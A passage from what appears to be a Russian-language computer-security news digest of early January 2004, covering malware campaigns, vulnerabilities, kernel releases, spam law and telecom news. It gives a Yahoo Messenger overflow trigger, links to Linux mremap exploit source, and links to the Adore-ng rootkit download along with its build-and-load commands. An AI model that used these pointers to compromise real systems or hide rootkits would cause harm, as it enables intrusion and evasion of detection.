Эксперты компьютерной безопасности предупреждают о новой версии вируса Mimail. По их прогнозам, в 2004 году веб-серферы не раз помянут это имя. Mimail.N приходит на ПК посредством электронной почты, в сообщении с темой "GREAT NEW YEAR OFFER FROM PAYPAL.COM!" и приложением "pp-app.zip". При активации вложенного файла выскакивает поп-окно, в котором пользователя просят указать электронный адрес, номер кредитки и идентификационный номер. Если компьютер не соединен на тот момент с Сетью, червь изменяет стартовую страницу Internet Explorer на веб-сайт, где содержится сатирическое изображение Джорджа Буша и обезьяны. Как известно первое появление Mimail было отмечено в августе 2003. С тех пор, Всемирная паутина познакомилась с множеством его вариантов. Консультанты по компьютерной безопасности из компании Sophos считают, что разновидности первоначальной заразы являются делом рук разных людей.
Источник - http://www.runet.ru

10/01/2004 15:44 Уязвимость в YIM.
Господин Tri Huynh (прим. переводчика - не решился её писать на русском языке ;)) из SentryUnion сообщает о существовании уязвимости в довольно популярном приложении для мгновенного обмена сообщаениями YIM - Yahoo Instant Messenger. Автор обнаружил, что при посылке сообщения, содержащего длиннное имя файла (например, "test<тут_210_пробелов>.jpg"), происходит переполнение буфера у принимающей стороны. При этом возникает возможность выполнения произвольного кода на машине жертвы. Как пишет далее автор, Yahoo была оповещена, однако ответа он не получил. Уязвимости подвержена версия ниже 5.6.0.1351. Тем не менее, на сайте http://messenger.yahoo.com появилась новая версия YIM - 5.6.0.1358, в которой уязвимости нет, однако апгрейд YIM невозможен. Для установки новой версии необходимо сначала снести старую, а уже потом установить новую.
Источник - http://www.securityfocus.com

10/01/2004 14:50 Статья о поиске закладок в ОС Linux.
Евгений Калошин ака Multik написал 2 довольно интересных и, несомненно, необходимых статьи, основное назначение которых - описание методики и способов поиска программных закладок в операционной системе Linux. В первой части описан общий случай - как и на что стоит обратить внимание при исследовании захваченной (или имеющей подозрение на захват) системы. Во второй статье автор рассматривает более конкретный пример - обнаружение руткита, который представляет собой LKM (Linux Kernel Module). В качестве подопытного был выбран руткит adore (мы писали о выходе его новой версии на прошедшй неделе). В качестве примера приводится Perl-скрипт (написанный, по словам автора, "на коленке), основное назначение которого поиск скрытых процессов путём анализа файловой системы /proc.
Первая часть - http://www.multik.ru/linux/bulgar/
Вторая часть - http://www.multik.ru/linux/bulgar2/

10/01/2004 13:08 AMD и Intel вводят в процессоры антивирусную технологию.
В ближайшее время производители процессоров представят технологию, которая позволит предупреждать многие атаки на аппаратном уровне. Технология AMD Execution Protection, встроенная в процессоры Athlon 64, предотвращает переполнение буфера — метод, которым хакеры часто пользуется для организации компьютерных атак. Переполнение буфера парализует систему защиты ПК, после чего в его память записывается программа злоумышленника, и процессор выполняет ее. При наличии Execution Protection данные из буфера могут только считываться, так что никакие грязные дела становятся невозможными, сказал в четверг директор AMD по маркетингу Джон Моррис в интервью на выставке Consumer Electronics Show в Лас-Вегасе. Такая схема уже реализована в процессорах Athlon 64, но еще не активизирована. AMD сделает это в начале второго квартала, когда Microsoft выпустит Service Pack 2 для Windows XP. К тому времени компания придумает броское название для этой технологии. Intel вводит аналогичную схему в Prescott, усовершенствованную версию Pentium 4, которая выйдет в следующем месяце. От комментариев в Intel отказались.
Подробности - http://zdnet.com.com/2100-1105_2-5137832.html

10/01/2004 12:43 Франция разрабатывает антиспамовое законодательство.
Французские власти, по-видимому, всерьез решили бороться с проблемой спама в своей стране, сообщает "Компьюлента". Накануне Генеральная Ассамблея Французской Республики во втором чтении одобрила ряд мер, ограничивающих возможности несанкционированной рассылки. Депутаты в своем законопроекте решили запретить рассылку коммерческих сообщений посредством электронной почты, факса и телефона без разрешения со стороны адресата. По идее, после подписания закона спамеры должны будут осведомляться у потенциальных клиентов, хотят ли те очередную порцию рекламы или нет. Молчание в данном случае будет рассмотрено как отказ. Тем временем, фирмы, занимающиеся легальной (санкционированной) рассылкой в течение шести месяцев обязаны получить подтверждения от своих подписчиков на дальнейшее обслуживание. Любопытно, что рассылка рекламных сообщений коммерческим фирмам не запрещена, главное, чтобы те имели возможность в любой момент отписаться от ненужной рекламы. Разбираться со всеми жалобами от жертв спама ассамблея поручила французской национальной комиссии по информатике и свободам (CNIL).
Подробности - http://fr.news.yahoo.com/040108/5/3kznf.html

10/01/2004 12:20 На Кубе ограничили выход в интернет.
В пятницу на Кубе вступил в силу закон, согласно которому доступ в интернет посредством государственной телефонной сети сильно ограничен, сообщает агентство Associated Press. Многие кубинцы выходили в интернет через линии домашних телефонов, пользуясь услугами черного рынка. Стоимость такого неофициального подключения достигала 50 долларов за 80 часов в месяц. К глобальной сети также подключены некоторые правительственные организации и учебные заведения. Ранее домашним интернетом официально могли пользоваться чиновники высшего ранга и врачи. Теперь, согласно новому закону, для сохранения этой привилегии им необходимо получить новое разрешение. Остальные кубинцы будут вынуждены прибегнуть к услугам коммерческой телефонной компании, взимающей плату в долларах, а не в песо. По новому закону, государственная телефонная компания должна отслеживать попытки несанкционированного выхода в интернет с домашних телефонов. Предполагается, что ужесточение закона о пользовании интернетом приведет к ликвидации черного рынка и сокращению преступлений, связанных с использованием компьютерных сетей. Все немногие интернет-провайдеры Кубы находятся под жестким контролем государства, уточняет агентство. Им разрешено предоставлять интернет-услуги, но только тем, кто располагает соответствующим разрешением властей.
Источник - http://www.lenta.ru

9/01/2004 17:41 Вирусописатели снова маскируются под письма от Microsoft.
"Лаборатория Касперского" сообщает об обнаружении новой троянской программы "Xombe", разосланной по интернету с использованием спам-методов. На данный момент антивирусной лабораторией зафиксированы случаи заражения этой вредоносной программой компьютеров в различных странах мира, что свидетельствует о крупном масштабе произведенной рассылки. "Xombe" представляет собой утилиту несанкционированного удаленного управления. "Троянец" устанавливает специальную программу, которая выполняет на зараженном компьютере получаемые извне команды. "Xombe" состоит из двух функциональных частей. Первая, загрузчик, представляет собой файл размером всего 4Кб. При запуске он соединяется через интернет с одним из удаленных серверов и незаметно загружает на компьютер вторую, главную часть "троянца". Последняя после установки постоянно находится в памяти и обращается в интернет на удаленный сайт, откуда загружает файлы, содержащие команды для троянца. При получении этих команд "Xombe" выполняет их на компьютере. В частности, "троянец" имеет возможность устанавливать и выполнять несанкционированные приложения, в том числе шпионского характера. "Лабораторией Касперского" был обнаружен дополнительный модуль, проводящий с зараженных компьютеров распределенную DoS-атаку на сервер интернет-форумов. В данном случае загрузчик "Xombe" был разослан по электронной почте с фальсифицированного адреса "windowsupdate@microsoft.com" под заголовком "Windows XP Service Pack 1 (Express) - Critical Update." В письме пользователям предлагается установить прилагаемое обновление для операционной системы Windows XP, которое якобы обеспечивает более высокий уровень надежности, безопасности и совместимости. Имя вложенного файла-носителя "троянца" - WINXP_SP1.EXE.
Источник - http://www.kaspersky.ru

9/01/2004 17:16 Уязвимость в INN.
Russ Allbery и Katsuhiro Kondou из ISC (Internet Software Consortium) сообщают о существовании уязвимости в популярном ПО для организации USENET News-сервера INN. Переполнение буфера было обнаружено в коде переключения управляющих сообщений, который был включён в INN с версии 2.4.0. Наличие переполнения позволяет удалённо получить шелл с правами пользователя innd, от которого запускается INN. Была выпущена INN 2.4.1, в которой уязвимость устранена. Также были выпущены различные кумулятивные патчи.
Подробности - http://www.isc.org/products/INN/

9/01/2004 16:40 Новая политика лицензирования DrWeb.
Санкт-Петербургская антивирусная лаборатория И.Данилова (ООО "СалД") ввела новую политику лицензирования для юридических лиц (корпоративных клиентов). Если раньше стоимость лицензии составляла около 14 т.р., то сейчас стоимость лицензии будет определяться кроме количества обслуживаемых серверов также и количеством защищаемых почтовых адресов (менее 50 адресов не обслуживаются). Минимальна конфигурация из одного Linux-сервера с поддержкой 50 адресов обойдётся теперь в 51400 рублей, 100 адресов - 63700. Сравните. Честно говоря, не совсем понятно с чем связан такой резкий скачок цен (кроме желания больше заработать, естественно). Порядок покупки лицензий для частных лиц не изменился. Желающие могут посчитать цены по ссылке, приведённой ниже.
Расчёты - http://www.drweb.ru/buy/ju/

9/01/2004 15:45 Братки перекочевали в Интернет.
Современные бандиты осваивают интернет-технологии с особым рвением. Сеть стала для них инструментом для свершения черных дел. Во Владивостоке неизвестные злоумышленники через Интернет занимаются вымогательством крупной суммы денег у одной известной в Приморье женщины-предпринимателя. По информации, которую сообщил ПТР частный детектив Георгий Дубинин, работающий на предпринимательницу, в середине декабря 2003 года бизнес-леди получила по обычной почте обычный с виду конверт. В нем содержалось предложение – если получательница не заплатит просителям 25 тысяч долларов США, то с ней случится нечто страшное. На конверте стоял штемпель приморского Дальнегорска, а дальнейшую связь с вымогателями предпринимательнице предлагалось вести по электронной почте, отправляя письма на один из e-mail бесплатных интернет-сервисов. В настоящее время предпринимательницу охраняют офицеры ФСБ, «залечь на дно» или на время выехать из страны она категорически отказалась – крупный бизнес не терпит отпусков и выходных. Вымогателей электронным письмом поставили в известность, что это преступление расследуется самым серьезным образом. Следователи ФСБ уверены: злоумышленники скоро будут задержаны.
Источник - http://www.ptr-vlad.ru/

9/01/2004 15:26 Электронные письма от ФБР таят опасность.
Вирусописатели ловят музыкальных фанатов на страхе быть замешенным в судебное дело о незаконном распространении файлов. Пользователям приходит якобы предупреждение от Федерального бюро расследований с сообщением о том, что они находятся под следствием. Сообщается, что в приложении содержатся доказательства их вины. Однако на самом деле - это всего лишь блестящий социальный инжиниринг конструкторов вирусов. В приаттаченном файле к липовому уведомлению находится злонамеренное программное обеспечение (malware). Несмотря на то, что письмо от ФБР выглядит подлинным, при более внимательном рассмотрении можно обнаружить фактические и орфографические ошибки, которые сводят игру вирусописателей на нет. Тем не менее, на данную электронную уловку попался не один десяток пользователей. Это ярко демонстрирует, как содержание сообщения может вводить людей в заблуждение.
Источник - http://www.runet.ru

9/01/2004 15:13 Выход ядра Linux 2.6.1.
8 января объявлено о выходе новой версии самой крайней стабильной версии ядра Linux - 2.6.1. Появлению предшествовало 3 релиз-кандидата (rc). Изменений довольно много набралось, понятно, что в новой версии устранена ошибка в обработке mremap(), а также доработаны драйверы различных периферийных устройств (особенно USB). Новое ядро доступно на различных зеркалах.
ChangeLog - http://www.kernel.org/pub/linux/kernel/v2.6/ChangeLog-2.6.1

9/01/2004 14:44 Экономика подталкивает к open-source.
Согласно недавнему исследованию, отношение крупных компаний к ПО управления базами данных с открытым исходным кодом заметно улучшилось. В прошедшем году популярность СУБД MySQL стремительно росла — на это указывают результаты исследования, опубликованные в понедельник аналитической фирмой Evans Data. Проведенный в декабре опрос 550 разработчиков показал, что MySQL применялась на 30% чаще, чем год назад, в то время как число установок с базами данных Microsoft SQL Server и Access увеличилось всего на 6%. В целом на рынке разработки баз данных продолжают доминировать продукты Microsoft. Однако стоимость ПО с открытым исходным кодом и возможность интегрировать его с другими программами хорошо согласуются с приоритетами разработчиков приложений, отмечает аналитик Evans Data Джо Маккендрик. Программисты часто выбирают одну и ту же СУБД как для разработки приложений, так и для их внедрения. Исследование Evans Data показало также, что интерес к низкой стоимости проявляется в выборе операционной системы: 62% разработчиков баз данных рассчитывают на некоторую экономию от использования Linux. Кроме того, разработчики часто объединяют несколько более дешёвых серверов базы данных в grid-конфигурацию в качестве экономичной альтернативы монолитным мощным серверам БД. 12% компаний, опрошенных Evans Data, сказали, что они уже внедряют системы grid-компьютинга или планируют их внедрение на ближайший год. Еще 9% намерены реализовать grid-стратегию в ближайшие два года.
Подробности - http://news.zdnet.co.uk/0,39020330,39118876,00.htm

8/01/2004 18:03 За создание вредоносных программ для ЭВМ – под суд.
Городской суд Пролетарского района Саранска осудил жителя столицы Мордовии Андрея Эрзяйкина на один год лишения свободы условно по статье 273 УК РФ «Создание, использование и распространение вредоносных программ для ЭВМ». Как сообщил государственный обвинитель Евгений Максимочкин, впервые в России гражданин осужден по этой статье. Следствием установлено, что программа, созданная Эрзяйкиным, позволяла изменять и обнулять данные по выручке, которые хранились в фискальной памяти контрольно-кассовых машин, изменять дату, количество покупок. Распространение программы предотвратили сотрудники отдела по расследованию преступлений в сфере высоких технологий МВД Мордовии. Они купили у Эрзяйкина процессор за 300 долларов и после того, как он продемонстрировал программу в работе, его задержали. Адвокат подсудимого Сергей Прончатов построил защиту на утверждении, что термин «ЭВМ» не применим к кассовому аппарату. Однако суд признал доводы защитника несостоятельными.
Источник - http://www.crime-research.ru/

8/01/2004 17:20 В России выявили банду интернет-мошенников.
Российским правоохранительным органам удалось вычислить и арестовать группировку мошенников, заманивавших своих жертв посредством рекламы в интернете, cообщает "Компьюлента". В пресс-службе Главного управления по борьбе с экономическими преступлениями (ГУБЭП) МВД России "Компьюленте" рассказали, что злоумышленники зарегистрировали во Владимире фирму по продаже металлопродукции "Интехком". После этого они открыли свой сайт www.rumm.ru (в настоящее время он закрыт) в интернете, где и стали рекламировать несуществующую продукцию. Поскольку цены, выставленные компанией, были ниже чем у конкурентов, то к услугам мошенников прибегла не одна организация. "С потенциальными жертвами общались грамотные люди, владеющие терминологией и знанием специфики деятельности технологий металлопроката, железнодорожных перевозок. Введенные в заблуждение предприниматели перечисляли деньги на расчетные счета созданных аферистами "фирм-однодневок", цитирует РИА "Новости" пресс-релиз ГУБЭП. В итоге, за четыре месяца преступная группа незаконно присвоила около 400 тысяч долларов США. Причем, пользуясь электронными средствами связи, мошенникам удалось создать целую сеть в регионах. Они действовали на территории Москвы, Санкт-Петербурга, Калуги, Владимира, Мурманска, Смоленска и Челябинска. Есть среди задержанных и одна жительница Магадана (ну, этой хоть ехать теперь недалеко придётся - прим. ньюсмейкера).
Подробности - http://www.rian.ru/rian/intro.cfm?nws_id=501674

8/01/2004 16:43 "Хит-парад" вирусов за декабрь от "Лаборатории Касперского".
"Лаборатория Касперского" опубликовала двадцатку самых активных вирусо-троянов за декабрь прошедшего года. Согласно ему, на первом месте - червь Swen - 33.87%, со второго по 4-е место - различные модификации червя Mimail. Так, версия "с" набрала 27.45%, а "g" и "a" - 7.15% и 4.21% соответственно.
Подробности - http://www.kaspersky.ru/news.html?id=144961191

8/01/2004 15:39 "Подарок" абонентам "Билайн" Московского региона.
С 22 января 2004 года изменяется тарификация услуг «Мобильный GPRS-интернет», GPRS-WAP и MMS для абонентов "БиЛайн GSM" всех систем расчётов. С 22.01.2004 услуги будут предоставляться по следующим тарифам (без НДС): плата за подключение услуг GPRS-0.10$, плата за возможность получения услуг GPRS 3 (ежемесячно для контракта)-0.09$ (в сутки для БИ+), мобильный GPRS-интернет - за 1 Мб переданной/полученной информации - 0.19$ (для контракта) - 0.19 (в сутки для БИ+),
GPRS-WAP за 1 Мб 0 (для контракта) 0.01 за 10 Кб (БИ+), MMS - за исходящее сообщение - 0.19 (для контракта) - 0.19 (для БИ+). До 15.04.2004 услуга MMS (для контракта) не тарифицируется. Вот такой вот посленовогодний "подарочек". Напомним, что МТС отменила бесплатный GPRS с 10 ноября (кажется).
Источник - http://www.nnm.ru

8/01/2004 13:24 О сотовой связи в новогоднюю ночь.
На сайте mobile-reviw.com опубликован довольно интересный отчёт Сергея Потресова о работе различных операторов сотовой (и не только) связи в новогоднюю ночь. Наверняка все понимают, что именно в это время нагрузка на каналы телефоннной сотовой связи возрастает в десятки (а то и сотни) раз. В целом, как отмечает автор, в эту новогоднюю ночь операторы справились с нагрузкой вполне достойно. "Многие операторы в новогоднюю ночь "отметились" нетипичными проблемами. Были жалобы на отказы отправки SMS-сообщений с телефонов Билайна и значительные задержки в доставке SMS. В МТС 31 декабря наблюдались проблемы с картами оплаты – баланс не пополнялся, а "временно потерявшиеся" деньги должны "материализоваться" на счете только через несколько дней. В Сонете немножко "взбесился" билинг – у некоторых абонентов 1 января баланс неожиданно стал отрицательным и телефоны заблокировались "за неоплату". По заверениям представителя компании пострадавших немного, но им от этого не легче. Забавный эпизод – с платежной картой Рапида. В процессе поисков пин-кода "Звезды" рапидовская карта случайно была найдена (завалилась за шкаф), под толстым слоем пыли обнаружилась надпись "Активировать до 31 декабря 2002 года". Эксперимента ради зашел на сайт Рапиды и – "удивительное рядом" – 50 рублей благополучно упали на счет Интернет-провайдера. Зато оплата телефона Корбины через Элекснет не совсем удалась: даже на следующий день автоинформатор сообщал о непогашенной задолженности, пришлось звонить в АС и диктовать реквизиты платежа. Нет, в последний день года лишний раз "напрягать" и без того перегруженные системы билинга явно не стоит. В заключение – новогодняя статистика Билайна: Только в первый час нового года абоненты компании совершили порядка 15 миллионов вызовов, одновременно устанавливалось до 47 000 соединений. Резкий рост трафика был отмечен в первые секунды новогодней ночи и приблизительно через 1,5 часа постепенно пошел на спад. Наибольшую активность абоненты «Би Лайн GSM» проявляли в Московской области, в результате чего дозвониться из Подмосковья было несколько сложнее. В среднем в первый час Нового года соединение по Москве и Московской области в сети «Би Лайн GSM» происходило с третьего раза. В последующие часы статистика соединений улучшилась и к 2-ум часам приблизилась к своей обычной норме. Если условно принять среднюю продолжительность разговора за 2 минуты, а среднюю цену минуты за 15 центов, то компания за первый час нового года заработала порядка четырех с половиной миллионов "безусловных единиц". Есть на что отметить хорошую работу сети в новогоднюю ночь!"
Подробности - http://www.mobile-review.com/articles/2004/newyear.shtml

8/01/2004 13:09 AOL будет оберегать своих клиентов от шпионского софта.
как сообщает compulenta.ru, один из крупнейших американских провайдеров, компания America Online (AOL), собирается реализовать в своем браузере специальную функцию для борьбы с программами-шпионами (spyware). Представитель крупного американского медиагиганта Time Warner, одним подразделений которого является AOL, в начале этой недели заявил, что технология нейтрализации шпионских программ будет внедрена в очередную версию браузера AOL 9.0, которая выйдет в свет в ближайшие несколько недель. Программы-шпионы (spyware) квалифицируются западными провайдерами как не менее опасные сетевые вредители, чем спам. Они попадают на компьютер при установке такого софта, как пиринговые клиенты, вроде Kazaa или eMule. Обычно spyware внедряются в маркетинговых целях и изучают спектр интересов пользователей интернета. Однако есть и менее безобидные варианты, которые могут отслеживать и передавать своему хозяину пароли доступа, адреса электронной почты и другие ценные данные (в том числе номера кредитных карточек). Согласно исследованиям, проведенным Национальным альянсом по кибербезопасности (National Cyber Security Alliance), на Западе до 91% пользователей интернета имеют на своих компьютерах spyware. В России же проблема со шпионскими программами стоит не так остро в силу меньшей распространенности широкополосного интернета и, как следствие, пирингового обмена.
Подробности - http://fr.news.yahoo.com/040107/85/3kx0v.html

8/01/2004 12:31 Ещё один эксплоит уязвимости в ядре Linux.
Angelo Dell'Aera, несколько изменив предыдущий эксплоит, написанный Christophe Devine и Julien Tinnes, опубликовал его для широкой общественности. Как пишет сам автор, его код более безопасный, чем предыдущий, ибо не "калечит" систему. Результат работы программы представлен в виду вывода строки о наличии (или отсутствии) уязвимости ядра.
Исходник - http://packetstorm.linuxsecurity.com/0401-exploits/mremap_bug.c

8/01/2004 12:12 Поддержка XFS в ядрах серии 2.4.
В ядра ветки 2.4 наконец-то была включена поддержка журналируемой файловой системы XFS. В ссылке ниже приведён список файлов (и сами файлы), включённые в исходники ядра для подеержки XFS.
Подробности - http://linux.bkbits.net:8080/linux-2.4/src/fs/xfs?nav=index.html|src/.|src/fs

8/01/2004 11:57 Intel выпустила Celeron M.
В понедельник Intel представила дешевые процессоры для ноутбуков, надеясь с их помощью сделать беспроводные вычисления массовыми. Celeron M представляет собой усеченную версию процессора Pentium М, которая вышла в марте прошлого года. Новый чип основан на том же процессорном ядре, но содержит кэш второго уровня емкостью 512 Кбайт и работает с меньшей тактовой частотой. У процессоров Pentium М емкость кэша составляет 1 Мбайт, а новая версия Pentium М с кодовым названием Dothan, которая дебютирует в феврале, будет снабжена 2-Мбайт кэшем. Позднее Dothan должен быть дополнен усовершенствованным чипсетом с более высокой пропускной способностью. Как и у Pentium М, у Celeron M есть специальные функции для понижения потребляемой энергии (это главная забота производителей беспроводных ноутбуков), но их не так много. Например, Celeron M не поддерживает технологию Intel SpeedStep, которая позволяет процессору замедлять работу и сберегать энергию при питании от батарей. Новое семейство чипов должно помочь Intel в реализации ее стратегии, направленной на повышение популярности сетей Wi-Fi у домашних пользователей.
Подробнее - http://www.zdnet.ru/?ID=311996

8/01/2004 11:54 Wall Street Journal: Yahoo! готовит Google тройной ответный удар.
Как сообщает lenta.ru, Портал Yahoo! намерен вернуть свои пошатнувшиеся с приходом поисковика-каталога Google позиции "стартовой страницы интернета". Для этого, пишет The Wall Street Journal, старейший из работающих ныне поисков-каталогов приготовил "тройной удар". Во-первых, Yahoo! намерен через запустить собственную систему поиска по своему необъятному каталогу. До сих пор, для того, чтобы предлагать размещение "предметно-ориентированной" рекламы (то есть появления рекламных ссылок по теме поиска) Yahoo! приходится пользоваться технологией... разработанной Google. Свой собственный внутренний поисковик Yahoo! намерен запустить уже в первом квартале 2004 года - как раз тогда. когда ожидается долгожданный выпуск акций Google Inc. Во-вторых, Yahoo! намерен усиливать "персонификацию и гибкость" своих услуг, то есть предоставлять постоянным зарегистрированным посетителям все более и более "индивидуальный" подход. И в третьих, Yahoo! намерен наращивать количество "спонсированных ссылок", то есть тех результатов поиска, которые будут зависеть не от релевантности, а появляться "в первом экране" за деньги. В настоящее время, напоминает The Wall Street Journal, рекламодатели платят Yahoo! от 15 центов до доллара с лишним за каждый клик по "спонсорской ссылке".
Подробности - http://www.lenta.ru/internet/2004/01/07/yahoogle/

7/01/2004 13:27 Компания Apple сделала МР3-плейер на 1000 песен размером с пачку сигарет.
Глава компании Apple Стив Джобс представил участникам конференции Macworld, проходящей в Сан-Франциско, самый маленький в мире МР3-плейер на 1000 песен. При размере всего 9 на 6 сантиметров объем его памяти достигает 4 гигабайтов. Как сообщает BBC News, мини-плейер появится в продаже весной по цене 249 долларов. iPod mini является уменьшенной версией стандартного МР3-плейера от Apple, который стал хитом продаж прошедшего года: только за последние три месяца было продано 730 тысяч экземпляров. С нового года память iPod будет увеличена с 10 до 15 гигабайтов при том, что сохранится прежняя цена - 299 долларов. Стив Джобс отметил, что надеется с помощью iPod mini укрепить позиции Apple как ведущего производителя МР3-плейеров. В настоящее время Apple занимает почти треть рынка портативных проигрывателей музыки в формате МР3 по количеству проданных экземпляров, и более половины - по полученной прибыли.
Подробности http://news.bbc.co.uk/2/hi/technology/3373031.stm

7/01/2004 12:41 Владельцам сотовых телефонов стоит ожидать атак хакеров.
Как нам сообщил один из наших посетителей (hack83(at)bk.ru), Австралийский журнал Computer World озаботился проблемой все возрастающей активности хакеров по отношению к мобильным устройствам. По мнению журналистов в 2004 году угроза лишь усилится. В основном, кончено, уязвимость представляют модели, оснащенные модулем Bluetooth. Про их общую незащищенность мы уже неоднократно писали. Основной мишенью хакеров могут стать телефонные книги и информация из органайзера жертвы, которая, в ряде случаев, весьма конфиденциальна. Вторая сфера потенциального применения талантов хакеров более опасна. Мобильные телефоны стали в последнее время звеном между многими компьютерами, причем защищенность "мобильных" аппаратов вызывает у австралийских журналистов резонные опасения. И последнее. Все чаще рядом со словом "хакер" стоит словосочетание "организованная преступность". Предполагается, что в 2004 году сращивание двух не совсем легальных групп продолжится. Попутно хотелось бы заметить для ребят из hack83. Ребята, если вы один к одному приводите новости, которые мы публикуем - не мешало бы всё-таки ссылку на наш сайт давать! Более того - это является одним из обязательных условий!
Источник - http://www.hack83.fhost.ru

6/01/2004 13:27 В Дубне закручивают гайки.
Компания «Контакт» (Дубна) установила новые правила пользования почтовыми ящиками клиентов, расположенными на сервере провайдера. Весь поток электронной почты, проходящий через почтовые сервера «Контакта», проверяется на наличие вирусов. При обнаружении вируса доставка сообщения блокируется. Ни получатель, ни отправитель не получают уведомлений. Почтовые сервера Компании могут отказать в приеме входящего сообщения в том случае, если: IP-адрес отправителя не преобразуется корректно в правильное имя хоста; IP-адрес отправителя занесен в сетевой «черный список» отправителей спама, например bl.spamcop.net; IP-адрес отправителя являеться частью DHCP, dialup, PPPoE или подобных сетей с динамическим присвоением IP-адресов, и закреплен за другим Интернет-провайдером (фактически, клиентам компании разрешено получать почту только от клиентов компании); в email-адресе отправителя указан несуществующий почтовый домен; email-адрес получателя не указан в заголовке To: в явном виде, а это значит, что клиенты не смогут получать большинство рассылок; в заголовках или теле письма будут обнаружены ключевые фразы, характерные для рекламных рассылок. Что это за фразы — не разглашается, клиент списком этих фраз никак не управляет. Абонент, на чей адрес направлялось отраженное сообщение, не получает никаких уведомлений. Абонентам, которые не согласны с этими правилами предложено отказаться от использования почтового ящика, предоставляемого провайдером. Таким образом, речь идет об установлении цензуры над почтой клиентов: компания «Контакт» отныне сама решает, какую почту ее клиенты могут получать, а какую — нет.
Источник http://www.provider.net.ru

6/01/2004 13:04 Европейские правозащитники ополчились на лицензионные CD.
Одно из европейских агентств по защите прав потребителей подало в суд на крупнейшие звукозаписывающие компании мира, протестуя против продажи защищенных от копирования CD-дисков, которые невозможно использовать в персональных компьютерах и в автомобильных магнитолах. Как сообщает агентство Reuters, иски базирующейся в Голландии организация Test-Aankoop, основаны на многочисленных жалобах европейских потребителей. В качестве ответчиков названы студии EMI, Universal Music, Sony Music и BMG. Истцы надеются создать юридический прецедент оспаривания способов защиты музыкальных записей от нелегального копирования. Процесс начнется уже на этой недели в Бельгии.
Источник - http://www.lenta.ru

6/01/2004 12:31 Статья о методах обнаружения троянов (руткитов).
На сайте hackinglinuxexposed.com опубликована вторая часть довольно интересной и полезной статьи, под названием "The mysteriously persistently exploitable program explained". Первая часть называлась "The mysteriously persistently exploitable program". Автор статьи - Brian Hatch, должность которого - Chief Hacker at Onsight, Inc (о как!). Брайан является также автором книг "Hacking Linux Exposed" и "Building Linux VPNs". В первой части рассказывалось, каким образом можно обнаружить присутствие в системе вредоносной программы (трояна, руткита), во второй - каким образом в системе остаётся эта программа при её удалении. Сосбственно, вторая часть больше посвящена нюансам работы с файловой системой Linux для определения скрытых файлов. Довольно интересная и поучительная статья.
Первая часть - http://www.hackinglinuxexposed.com/articles/20031111.html
Вторая часть - http://www.hackinglinuxexposed.com/articles/20031214.html

6/01/2004 12:07 Выход новой версии rootkit Adore-ng.
Довольно необычный анонс прошёл в BUGTRAQ (если учитывать тематику списка рассылки). Некий господин с ником Stealth из группы TESO (международная группа энтузиастов программирования и сетевой безопасности - как написано в информации) объявил об обновлении довольно известного руткита (rootkit) Adore-ng (ng - надо понимать, как Next generation? ;)) - вышла версия 0.31. Среди особеннотей этого руткита: возможность запуска на ядрах 2.4 в SMP-варианте (многопроцессорность), тестовая версия сего зверя работает на ядре 2.6.0, скрытие файлов, запущенных процессов и директорий, скорытие запускаемых сокетов (LISTEN, CONNECTED etc.) и др. Отличия от предыдущих версий: фильтрация syslog-вызовов (скрытые процессы никогда не попадают (якобы - прим. ньюсмейкера) в системные журналы), фильтрация попыток записи в wtmp/utmp/lastlog, модернизация процесса внедрения в ядро с использованием LKM (как пишет автор, на основании статьи в phrack #61. Для желающих взять это "счастье" - ссылка внизу. Сборка осуществляется двумя способами: './configure && make && ./startadore' или './configure && make && ./relink'. В списке файлов на сайте автора имеется файлик, из которого следует. что руткит не отлавливается chkrootkit.
Adore-ng - http://stealth.7350.org/rootkits/adore-ng-0.31.tgz

6/01/2004 11:47 Эксплоит уязвимости ядра Linux.
Вдогонку к предыдущей теме. Опубликован эксплоит уязвимости ядра Linux, написанный Christophe Devine и Julien Tinnes. Спасибо ребятам из SecurityLab за то, что нашли его. :)
Исходник - http://www.securitylab.ru/42037.html

6/01/2004 10:49 Выход ядра Linux 2.4.24.
После обнародования существования локальной уязвимости в предыдущей версии ядра ветви 2.4 - 2.4.23 последовало обновление ядер в основных дистрибутивах Linux, а также выход версии 2.4.23-rc1. Как и следовало ожидать, Marcelo Tosatti объявил о выходе стабильной версии ядра - 2.4.24, которая, собственно, абсолютно ничем не отличается от версии 2.4.23-rc1. Помимо устранения уязвимости в mremap() были добавлены косметические изменения в частях кода, которые отвечают за работу IrDA, в /dev/rtc (real time clock), не совем корректная реализация которого могла привести к утечке критически важных данных к непривилегированным пользователям. Новая версия доступна на многочисленных зеркалах.
Подробности - http://kerneltrap.org/node/view/1958

6/01/2004 10:28 Macromedia модернизирует мультимедийные инструменты.
В понедельник Macromedia намерена анонсировать новую версию своего мультимедийного инструментария Director. Это одно из старейших приложений компании, которое восходит еще к тем дням, когда мультимедийный контент распространялся не через интернет, а главным образом на CD-ROM. Основными рынками для этого ПО служат фирмы, разрабатывающие специальное образовательное и обучающее ПО, а также разработчики простых игр и другой анимации для плеера Macromedia Shockwave. Новый Director MX 2004 поддерживает язык JavaScript и нацелен на то, чтобы сделать приложения более доступными для разработчиков, незнакомых с форматом Macromedia Lingo. Это продолжение курса, начатого с недавнего выпуска версии инструментария Macromedia Flash, имитирующей способ работы программистов на Java. Помимо этого, новый Director поддерживает больше медиаформатов, включая Microsoft Windows Media и DVD video. К тому же ПО интегрировано с последними версиями инструментов веб-дизайна и разработки Macromedia, включая Flash MX 2004. Director MX 2004 позволит легче импортировать и быстрее обрабатывать Flash-контент и будет включать ряд готовых Flash-компонентов для создания пользовательских интерфейсов.
Подробности - http://news.com.com/2100-1012_3-5134696.html?tag=nefd_top

5/01/2004 16:48 Предотвращение внедрения трояна в код ядра Linux.
Dan Warne на страницах электронного издания APCMag сообщает о том, что была пресечена попытка внесения вредоносного кода ("чёрного хода") в дерево исходных кодов ядра Linux. Внесённый код позволял удалённому злоумышленнику, который знал о наличии этого кода, входить незамеченным в систему с установленной заплаткой. Сообщается, что попытка внесения изменения в код была обнаружена в течение 24 часов и пресечена Линусом Торвальдсом, что говорит о попытке внесения заплатки в ядро 2.6. Попытка внесения изменения в зеркало кода (так называемый репозитарий CVS) произведена с незащищённого компьютера в одной из университетских лабораторий. Само изменение включало в себя всего 2 строки, в одной из которых символ операции сравнения (==) был изменён на знак равенства(=) в низкоуровневом вызове функции Wait4(), что, как понимают программисты, может привести к абсолютно противоположным результатам. Изменение было замаскировано в изменение, которое якобы официально внёс законный и заслуженный разработчик ядра Dave Miller. В статье подчёркивается, что попытка внесения изменений была пресечена из-за использования помимо CVS ещё одной системы контроля за версиями под названием BitKeeper, обладающей более высоким уровнем защиты. (прим. ньюсмейкера - не знаю почему, но у меня почему то сложилось 